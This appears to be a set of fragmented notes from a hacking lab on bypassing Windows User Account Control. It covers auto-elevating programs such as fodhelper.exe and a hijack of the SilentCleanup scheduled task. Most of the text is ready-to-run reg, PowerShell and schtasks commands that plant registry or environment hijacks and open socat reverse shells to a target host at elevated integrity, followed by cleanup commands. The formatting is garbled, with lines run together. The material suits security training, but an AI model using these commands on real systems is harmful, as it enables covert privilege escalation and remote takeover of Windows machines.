Application Information Service, a.k.a Appinfo
ShellExecute
API call is made via runas.exe
consent.exe
, dialogue opens upMandatory Label
is shown via whoami /groups
msconfig
, always got integrity level high via auto elevationTools
choose Command Prompt
and press Launch
to get an elevated cmd.exe
azman.msc
--> Help
--> Help Topics
view source
Open
--> File
, select All Files
C:\Windows\System32\cmd.exe
and right click on it to open Must be in a trusted dir like Program Files
or Windows
Additionaly, portable executables need autoelevate
in the manifest. Check via
sigcheck64.exe -m <portable_executable.exe>
mmc.exe
autoelevates depending on user request for msc-snapin*.msc
s, spinstall.exe
, pkgmgr.exe
as well as COM objects autoelevateHKEY_LOCAL_MACHINE\Software\Classes
which is superseded by the current user profile HKEY_CURRENT_USER\Software\Classes
ms-settings
ProgID is searched for by fodhelper.exe
, this setting overrides system defaults of which executable opens the filetypeThe subprocess of fodhelper.exe
inherits intergrity level high
Open reverse shell on attacker and
whoami
net user <user> | find "Local Group"
whoami /groups | find "Label"
set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:$TARGET_IP:4444 EXEC:cmd.exe,pipes"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe
reg delete HKCU\Software\Classes\ms-settings\ /f
$program = "powershell -windowstyle hidden C:\tools\socat\socat.exe TCP:$TARGET_IP:4445 EXEC:cmd.exe,pipes"
New-Item "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Force Set-ItemProperty "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Name "(default)" -Value $program -Force
New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".pwn" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:$TARGET_IP:4445 EXEC:cmd.exe,pipes"
reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /d %CMD% /f
reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
fodhelper.exe
reg delete "HKCU\Software\Classes\.thm\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f
%windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%
%windir%
to a reverse shell viareg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe TCP:$TARGET_IP:4711 EXEC:cmd.exe,pipes &REM " /f
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
reg delete "HKCU\Environment" /v "windir" /f
Social_engineering